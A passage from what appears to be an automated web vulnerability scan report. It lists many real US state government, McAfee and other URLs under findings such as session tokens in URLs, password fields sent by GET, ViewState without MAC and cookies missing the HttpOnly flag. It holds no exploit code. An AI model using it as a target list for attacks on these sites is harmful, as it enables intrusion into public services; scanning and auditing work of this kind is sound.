7.61. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

7.62. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

7.63. https://www.nrsservicecenter.com/iApp/ret/landing.do

7.64. https://www.nrsservicecenter.com/iApp/ret/showPage.do

7.65. https://www.scsignon.sc.gov/

7.66. https://www.tennesseeanytime.org/paams-app/index.htm

7.67. https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp

7.68. https://www.vermontjoblink.com/ada/

7.69. https://www.vermontjoblink.com/ada/404/404_qry.cfm

7.70. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

7.71. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

7.72. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

7.73. https://www.vermontjoblink.com/ada/default.cfm

7.74. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

7.75. https://www.vermontjoblink.com/ada/leavesite.cfm

7.76. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

7.77. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

7.78. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

7.79. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

7.80. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

7.81. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

7.82. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

7.83. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

7.84. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

7.85. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

7.86. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

7.87. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

7.88. https://www.vermontjoblink.com/ada/works/FAQ.cfm

7.89. https://www.vermontjoblink.com/ada/works/Login.cfm

7.90. https://www.vermontjoblink.com/ada/works/contactus.cfm

7.91. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

7.92. https://www.vermontjoblink.com/ada/works/joboverview.cfm

7.93. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

7.94. https://www.vermontjoblink.com/ada/works/linkview.cfm

7.95. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

7.96. https://www.vermontjoblink.com/favicon.ico

7.97. https://adwords.google.com/um/StartNewLogin

7.98. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php

7.99. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS

7.100. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

7.101. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css

7.102. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css

7.103. https://assist.dhss.delaware.gov/favicon.ico

7.104. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg

7.105. https://assist.dhss.delaware.gov/images/Assist_header_text.gif

7.106. https://assist.dhss.delaware.gov/images/Assist_logo.gif

7.107. https://assist.dhss.delaware.gov/images/arrow_center.gif

7.108. https://assist.dhss.delaware.gov/images/arrow_left.gif

7.109. https://assist.dhss.delaware.gov/images/arrow_right.gif

7.110. https://assist.dhss.delaware.gov/images/corner_brown_color.gif

7.111. https://assist.dhss.delaware.gov/images/corner_teal_color.gif

7.112. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif

7.113. https://assist.dhss.delaware.gov/images/shim.gif

7.114. https://favorites.live.com/quickadd.aspx

7.115. https://fortress.wa.gov/dol/dolprod/vehoffices/

7.116. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css

7.117. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css

7.118. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css

7.119. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css

7.120. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

7.121. https://iris.custhelp.com/rnt/rnw/css/enduser.css

7.122. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif

7.123. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js

7.124. https://iris.va.gov/favicon.ico

7.125. https://maps-api-ssl.google.com/maps

7.126. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

7.127. https://pixel.fetchback.com/serve/fb/pdc

7.128. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

7.129. https://www.accesskansas.org/dissolutions/

7.130. https://www.accesskansas.org/images/footer_images/current_year.gif

7.131. https://www.accesskansas.org/images/footer_images/from2002.gif

7.132. https://www.accesskansas.org/kbc/img/icons/external.png

7.133. https://www.alabamainteractive.org/favicon.ico

7.134. https://www.bbb.org/online/consumer/cks.aspx

7.135. https://www.colorado.gov/apps/feedback/servlet/begin

7.136. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

7.137. https://www.mcafeesecure.com/RatingVerify

7.138. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

7.139. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

7.140. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

7.141. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

7.142. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

7.143. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

7.144. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

7.145. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

7.146. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

7.147. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

7.148. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

7.149. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

7.150. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

7.151. https://www.nrsservicecenter.com/favicon.ico

7.152. https://www.ri.gov/Licensing/renewal/license.php

7.153. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

7.154. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

7.155. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

7.156. https://www.scsignon.sc.gov/Login.aspx

7.157. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx

7.158. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx

7.159. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx

7.160. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx

7.161. https://www.scsignon.sc.gov/WebResource.axd

7.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

8. Session token in URL

8.1. http://apps.tn.gov/bizreg/tax.jsp

8.2. https://apps.tn.gov/bizreg/tax.jsp

8.3. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

8.4. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

8.5. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

8.6. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml

8.7. http://az.gov/app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx

8.8. http://bh.contextweb.com/bh/set.aspx

8.9. http://de.gov/

8.10. http://de.gov/profile.php

8.11. http://ga.gov/00/home/0,2061,4802,00.html

8.12. http://ga.gov/00/home/0,2061,4802,00.html

8.13. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard

8.14. http://l.sharethis.com/pview

8.15. https://louisianadcpretire.gwrs.com/login.do

8.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

8.17. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

8.18. http://mt0.googleapis.com/mapslt/ft

8.19. https://myalaska.state.ak.us/home/app

8.20. http://server.iad.liveperson.net/hc/33511087/

8.21. https://services.georgia.gov/dhr/cspp/do/public/Welcome

8.22. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

8.23. http://www.ehawaii.gov/dakine/index.html

8.24. http://www.goccp.maryland.gov/lists/index.php

8.25. http://www.in.gov/dhs/3163.htm

8.26. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

8.27. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm

8.28. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

8.29. http://www.utah.gov/transparency/index.html

9. SSL certificate

9.1. https://nhlicenses2.nh.gov/

9.2. https://mibid.bidcorp.com/

9.3. https://nhlicenses.nh.gov/

9.4. https://treas-secure.treas.state.mi.us/

9.5. https://www.alabamainteractive.org/

9.6. https://www.compasssmartshopper.com/

9.7. https://www.nrsservicecenter.com/

10. Password field submitted using GET method

10.1. http://digg.com/submit

10.2. http://www.alabama.gov/portal/index.jsp

11. ASP.NET ViewState without MAC enabled

11.1. https://fortress.wa.gov/dol/dolprod/dsdoffices/

11.2. https://home.mcafee.com/secure/cart

11.3. https://home.mcafee.com/secure/cart/

11.4. https://home.mcafee.com/secure/purchase/

11.5. http://sd.gov/headlines/headlines_home/headlines.aspx

11.6. http://www.vitalchek.com/louisiana-express-vital-records.aspx

12. Open redirection

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline/okgov.json

13.2. https://fin.oaks.ohio.gov/psp/FNPRD/

13.3. https://hcm.oaks.ohio.gov/psp/HCPRD/

13.4. http://home.mcafee.com/

13.5. http://home.mcafee.com/AdviceCenter/Default.aspx

13.6. http://home.mcafee.com/Default.aspx

13.7. http://home.mcafee.com/Root/AboutUs.aspx

13.8. http://home.mcafee.com/Root/Support.aspx

13.9. http://home.mcafee.com/SiteMap.aspx

13.10. http://home.mcafee.com/Store/

13.11. http://home.mcafee.com/Store/Downloads.aspx

13.12. http://home.mcafee.com/VirusInfo/

13.13. http://home.mcafee.com/root/MyAccount.aspx

13.14. http://home.mcafee.com/root/dynamicpage.aspx

13.15. http://home.mcafee.com/store/default.aspx

13.16. http://home.mcafee.com/supportpages/privacyFeedback.aspx

13.17. http://home.mcafee.com/supportpages/purchasehelp.aspx

13.18. https://home.mcafee.com/ScriptResource.axd

13.19. https://home.mcafee.com/Secure/Protected/Login.aspx

13.20. https://home.mcafee.com/WebResource.axd

13.21. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

13.22. https://home.mcafee.com/secure/cart

13.23. https://home.mcafee.com/secure/cart/

13.24. https://home.mcafee.com/secure/purchase/

13.25. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

13.26. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

13.27. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

13.28. http://us.mcafee.com/root/basket.asp

13.29. http://www.coloradochannel.net/

13.30. http://www.exploreohio.org/node/11452

13.31. http://www.georgiawildlife.com/

13.32. http://www.georgiawildlife.com/boating/registration

13.33. http://www.georgiawildlife.com/node/1873

13.34. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

13.35. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm

13.36. http://www.illinois.gov/PressReleases/ShowbyM.cfm

13.37. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

13.38. http://www.netflix.com/

13.39. http://www.netflix.com/NRD/PS3

13.40. http://www.netflix.com/NRD/Wii

13.41. http://www.netflix.com/NRD/Xbox

13.42. http://www.opensource.org/licenses/mit-license.php

13.43. http://www.tanfa.co.uk/archives/show.asp

13.44. http://www.vsea.org/

13.45. http://a.triggit.com/px

13.46. http://ads.adbrite.com/adserver/vdi/711384

13.47. https://adwords.google.com/select/Login

13.48. https://adwords.google.com/um/StartNewLogin

13.49. http://b.scorecardresearch.com/b

13.50. http://bh.contextweb.com/bh/rtset

13.51. http://bh.contextweb.com/bh/set.aspx

13.52. http://blogsearch.google.com/

13.53. http://books.google.com/bkshp

13.54. http://books.google.com/books

13.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.56. http://del.icio.us/post

13.57. https://favorites.live.com/quickadd.aspx

13.58. http://finance.yahoo.com/q

13.59. http://groups.google.com/grphp

13.60. http://i.w55c.net/rs

13.61. http://ib.adnxs.com/seg

13.62. http://id.google.com/verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif

13.63. http://id.google.com/verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif

13.64. http://id.google.com/verify/EAAAAMOrTls6merGAfxdZppvi6I.gif

13.65. http://id.google.com/verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif

13.66. http://idcs.interclick.com/Segment.aspx

13.67. http://image.providesupport.com/js/hic/safe-standard.js

13.68. http://image.providesupport.com/js/hic/safe-textlink.js

13.69. http://image2.pubmatic.com/AdServer/Pug

13.70. http://kdkgllry.netmng.com/

13.71. http://khmdb0.google.com/kh

13.72. http://khmdb1.google.com/kh

13.73. https://maps-api-ssl.google.com/maps

13.74. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

13.75. http://newbrowse.livehelper.com/servlet/lhBrowse

13.76. http://picasaweb.google.com/home

13.77. http://picasaweb.google.com/lh/view

13.78. http://pipes.yahoo.com/pipes/pipe.run

13.79. https://pixel.fetchback.com/serve/fb/pdc

13.80. http://pixel.mathtag.com/event/img

13.81. http://pixel.quantserve.com/pixel

13.82. http://pixel.rubiconproject.com/tap.php

13.83. http://scholar.google.com/schhp

13.84. http://server.iad.liveperson.net/hc/33511087/

13.85. http://shots.snap.com/snap_shots.js

13.86. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127

13.87. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197

13.88. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136

13.89. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296

13.90. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344

13.91. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755

13.92. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

13.93. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832

13.94. http://video.google.com/

13.95. http://www.access-board.gov/sec508/guide/1194.22.htm

13.96. http://www.facebook.com/TeamHaslam

13.97. http://www.facebook.com/WSDOL

13.98. http://www.facebook.com/campaign/landing.php

13.99. http://www.facebook.com/note.php

13.100. http://www.facebook.com/ohiodivisionofwatercraft

13.101. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

13.102. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

13.103. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

13.104. http://www.facebook.com/photo.php

13.105. http://www.facebook.com/share.php

13.106. http://www.facebook.com/video/video.php

13.107. http://www.flickr.com/groups_join.gne

13.108. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

13.109. http://www.linkedin.com/companies/166141

13.110. http://www.molottery.com/winningNumbers.do

13.111. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

13.112. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

13.113. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

13.114. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

13.115. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

13.116. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

13.117. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

13.118. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

13.119. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

13.120. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

13.121. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

13.122. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

13.123. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

13.124. https://www.nrsservicecenter.com/favicon.ico

13.125. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

13.126. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

13.127. https://www.nrsservicecenter.com/iApp/ret/landing.do

13.128. https://www.nrsservicecenter.com/iApp/ret/showPage.do

13.129. http://www.real.com/realplayer

13.130. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do

14. Cookie without HttpOnly flag set

14.1. https://apps.tn.gov/bizreg/bizregprog

14.2. https://apps.tn.gov/bizreg/tax.jsp

14.3. https://apps.tn.gov/biztax-app/login.html

14.4. https://apps.tn.gov/paams-app/index.htm

14.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm

14.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm

14.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp

14.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

14.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp

14.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

14.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

14.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

14.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp

14.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp

14.15. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml

14.16. http://badge.dopiaza.org/flickr/badge.php

14.17. http://ca.gov/

14.18. http://cityofmuscleshoals.com/Default.asp

14.19. http://crd.dnr.state.ga.us/content/displaynavigation.asp

14.20. https://dhr.ky.gov/DHRWeb/RS

14.21. http://dnr.maryland.gov/service/

14.22. https://dotax.ehawaii.gov/efile/user

14.23. https://edmv-sp.dot.state.nc.us/sp/NoticeServlet

14.24. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

14.25. http://elicense4-lookup.com.ohio.gov/SearchCriteria.asp

14.26. http://factfinder.census.gov/servlet/EconSectorServlet

14.27. https://fin.oaks.ohio.gov/psp/FNPRD/

14.28. https://fortress.wa.gov/dol/dolprod/dsdoffices/

14.29. http://ga.gov/

14.30. http://ga.gov/gta/GTASearch

14.31. http://ga.gov/mobile

14.32. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

14.33. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

14.34. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

14.35. https://hcm.oaks.ohio.gov/psp/HCPRD/

14.36. http://home.mcafee.com/

14.37. http://home.mcafee.com/AdviceCenter/Default.aspx

14.38. http://home.mcafee.com/Default.aspx

14.39. http://home.mcafee.com/Root/AboutUs.aspx

14.40. http://home.mcafee.com/Root/Support.aspx

14.41. http://home.mcafee.com/SiteMap.aspx

14.42. http://home.mcafee.com/Store/

14.43. http://home.mcafee.com/Store/Downloads.aspx

14.44. http://home.mcafee.com/VirusInfo/

14.45. http://home.mcafee.com/root/MyAccount.aspx

14.46. http://home.mcafee.com/root/dynamicpage.aspx

14.47. http://home.mcafee.com/store/default.aspx

14.48. http://home.mcafee.com/supportpages/privacyFeedback.aspx

14.49. http://home.mcafee.com/supportpages/purchasehelp.aspx

14.50. https://home.mcafee.com/ScriptResource.axd

14.51. https://home.mcafee.com/Secure/Protected/Login.aspx

14.52. https://home.mcafee.com/WebResource.axd

14.53. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

14.54. https://home.mcafee.com/secure/cart

14.55. https://home.mcafee.com/secure/cart/

14.56. https://home.mcafee.com/secure/purchase/

14.57. http://hpd.dnr.state.ga.us/content/displaycontent.asp

14.58. http://il.gov/

14.59. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5

14.60. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

14.61. http://le.utah.gov/asp/lfa/lfareports.asp

14.62. http://legis.state.la.us/main.asp

14.63. http://legis.state.la.us/main.asp

14.64. http://legis.state.la.us/main.asp

14.65. https://license.ohio.gov/lookup/default.asp

14.66. https://louisianadcpretire.gwrs.com/login.do

14.67. http://maillist2.nh.gov/lists/

14.68. http://mhcc.maryland.gov/consumerinfo/hospitalguide/hospital_guide/reports/find_a_hospital/index.asp

14.69. https://moversguide.usps.com/icoa/flow.do

14.70. https://myalaska.state.ak.us/home/app

14.71. http://nc.gov/favicon.ico

14.72. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

14.73. http://nd.gov/

14.74. http://nd.gov/category.htm

14.75. http://nd.gov/content.htm

14.76. http://nd.gov/postcard.htm

14.77. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx

14.78. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

14.79. http://nvsos.gov/index.aspx

14.80. https://onestop.michigan.gov/OneStop/a

14.81. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do

14.82. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do

14.83. http://pa.gov/portal/server.pt

14.84. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/pagov_portal_header/images/temp/header_logo.gif

14.85. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/stylesheets/pagov.css

14.86. http://path.trackinglabs.com/c.php

14.87. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

14.88. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

14.89. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

14.90. http://puco.ohio.gov/Puco/Utilities/OneStop.cfm

14.91. http://puco.ohio.gov/puco/forms/form.cfm

14.92. http://regulatorystaff.sc.gov/orsContent.asp

14.93. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm

14.94. https://secure.sces.org/PDIC/GatewayServlet

14.95. https://secure.utah.gov/rex/

14.96. https://secure.utah.gov/rex/index.html

14.97. https://services.georgia.gov/dhr/cspp/do/public/Welcome

14.98. http://smu.governor.delaware.gov/cgi-bin/mail.php

14.99. http://smu.portal.delaware.gov/cgi-bin/mail.php

14.100. http://sussex.de.schoolwebpages.com/education/school/school.php

14.101. https://unitedalert.com/

14.102. http://us.mcafee.com/root/basket.asp

14.103. http://us.mcafee.com/root/basket.asp

14.104. http://us.mcafee.com/root/basket.asp

14.105. http://us.mcafee.com/root/basket.asp

14.106. http://va.gov/ext_redirect.asp

14.107. http://va.gov/ext_redirect.asp

14.108. https://web.globalpay.com/taxpayer/default.asp

14.109. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do

14.110. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do

14.111. http://www.511ia.org/default.asp

14.112. https://www.accesskansas.org/bess/flow/main

14.113. https://www.accesskansas.org/businesscenter/index.html

14.114. https://www.accesskansas.org/dissolutions/

14.115. http://www.adfg.alaska.gov/index.cfm

14.116. http://www.agriculture.state.tn.us/Marketing.asp

14.117. http://www.alabama.gov/portal/index.jsp

14.118. https://www.alabamainteractive.org/abc_license/

14.119. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

14.120. http://www.buzgate.org/8.0/ny/fh.html

14.121. http://www.capehenlopenschools.com/education/district/district.php

14.122. http://www.carson-city.nv.us/Index.aspx

14.123. http://www.colorado.gov/

14.124. http://www.colorado.gov/cs/Satellite

14.125. http://www.coloradochannel.net/

14.126. http://www.conwaygreene.com/nmonesource/publicLicense.aspx

14.127. http://www.cotrip.org/device.htm

14.128. http://www.dds.ga.gov/drivers/DLdata.aspx

14.129. http://www.deldot.gov/public.ejs

14.130. http://www.delmar.k12.de.us/education/district/district.php

14.131. http://www.dhh.louisiana.gov/links.asp

14.132. http://www.dhh.louisiana.gov/offices/

14.133. http://www.dhh.louisiana.gov/offices/email-page.asp

14.134. http://www.dhh.louisiana.gov/offices/faq.asp

14.135. http://www.dhh.louisiana.gov/offices/inquiryform.asp

14.136. http://www.dhh.louisiana.gov/offices/links.asp

14.137. http://www.dhh.louisiana.gov/offices/locations.asp

14.138. http://www.dhh.louisiana.gov/offices/page.asp

14.139. http://www.dhh.louisiana.gov/offices/page.asp

14.140. http://www.dhh.louisiana.gov/offices/publications.asp

14.141. http://www.dhh.louisiana.gov/offices/reports.asp

14.142. http://www.dhh.louisiana.gov/page.asp

14.143. http://www.dms.myflorida.com/mfmp

14.144. http://www.dsf.health.state.pa.us/health/cwp/view.asp

14.145. http://www.energyguide.com/EnergySmartSBE/welcomeba.asp

14.146. http://www.exploreohio.org/node/11452

14.147. http://www.flsenate.gov/Legislators/index.cfm

14.148. http://www.georgia.gov/external/

14.149. http://www.georgia.gov/gta/translate/0,2678,4802,00.html

14.150. http://www.georgiawildlife.com/

14.151. http://www.georgiawildlife.com/boating/registration

14.152. http://www.georgiawildlife.com/node/1873

14.153. http://www.goccp.maryland.gov/lists/index.php

14.154. http://www.governor.state.pa.us/portal/server.pt

14.155. http://www.governor.wa.gov/news/news-view.asp

14.156. http://www.healthynh.com/index-fhc.php

14.157. http://www.heretohelp.pa.gov/portal/server.pt

14.158. http://www.hoosierdata.in.gov/nav.asp

14.159. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

14.160. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

14.161. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm

14.162. http://www.illinois.gov/PressReleases/ShowbyM.cfm

14.163. http://www.in.gov/sliverheader/Welcome.do

14.164. http://www.instacam.com/search.asp

14.165. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

14.166. http://www.legis.louisiana.gov/boards/board_members.asp

14.167. http://www.legis.state.la.us/billdata/bytype.asp

14.168. http://www.linkedin.com/companies/166141

14.169. http://www.mema.state.md.us/MEMA/content_page.jsp

14.170. http://www.molottery.com/winningNumbers.do

14.171. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm

14.172. http://www.ms.gov/

14.173. http://www.ms.gov/how_do_i_answer_page.jsp

14.174. http://www.ms.gov/how_do_i_fulllist.jsp

14.175. http://www.ms.gov/how_do_i_sub_answer_page.jsp

14.176. http://www.ms.gov/ms_sub_sub_template.jsp

14.177. http://www.ms.gov/ms_sub_template.jsp

14.178. http://www.ms.gov/online_services_sub_sub_all.jsp

14.179. http://www.ms.gov/state_agencies_alpha.jsp

14.180. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

14.181. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

14.182. http://www.nccrimecontrol.org/Index2.cfm

14.183. http://www.nd.gov/content.htm

14.184. http://www.netflix.com/

14.185. http://www.netflix.com/NRD/PS3

14.186. http://www.netflix.com/NRD/Wii

14.187. http://www.netflix.com/NRD/Xbox

14.188. http://www.nist.gov/search-results.cfm

14.189. http://www.nmshtd.state.nm.us/main.asp

14.190. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

14.191. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

14.192. https://www.nrsservicecenter.com/iApp/ret/landing.do

14.193. https://www.nrsservicecenter.com/iApp/ret/showPage.do

14.194. http://www.ok.gov/genthree/get_resized_image.php

14.195. http://www.ok.gov/genthree/rt_get_resized_image.php

14.196. http://www.opensource.org/licenses/mit-license.php

14.197. http://www.p2pays.org/ref/07/06568/2001/nframe.asp

14.198. http://www.pa.gov/portal/server.pt

14.199. http://www.portal.state.pa.us/portal/server.pt/document/1036792/corbettwebphoto_jpg

14.200. http://www.psp.state.pa.us/portal/server.pt

14.201. http://www.qualityinfo.org/olmisj/OlmisZine

14.202. http://www.real.com/realplayer

14.203. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do

14.204. http://www.scdmvonline.com/DMVNew/default.aspx

14.205. http://www.sled.state.sc.us/sled/default.asp

14.206. http://www.sus.edu/CatSubCat/CatSubCat.asp

14.207. http://www.tanfa.co.uk/archives/show.asp

14.208. https://www.tennesseeanytime.org/paams-app/index.htm

14.209. http://www.texasonline.state.tx.us/app/orig/index.jsp

14.210. http://www.theoutdoorshop.state.pa.us/FBG/game/GameLicenseSelect.asp

14.211. http://www.txdmv.gov/vehicles/registration/register.htm

14.212. http://www.utah.gov/locationaware/getMeetings.html

14.213. http://www.utah.gov/pmn/sitemap/notice/67945.html

14.214. http://www.utah.gov/services/

14.215. http://www.utah.gov/services/business.html

14.216. http://www.utah.gov/services/financial.html

14.217. http://www.utah.gov/services/index.html

14.218. http://www.utah.gov/transparency/entity_profile.html

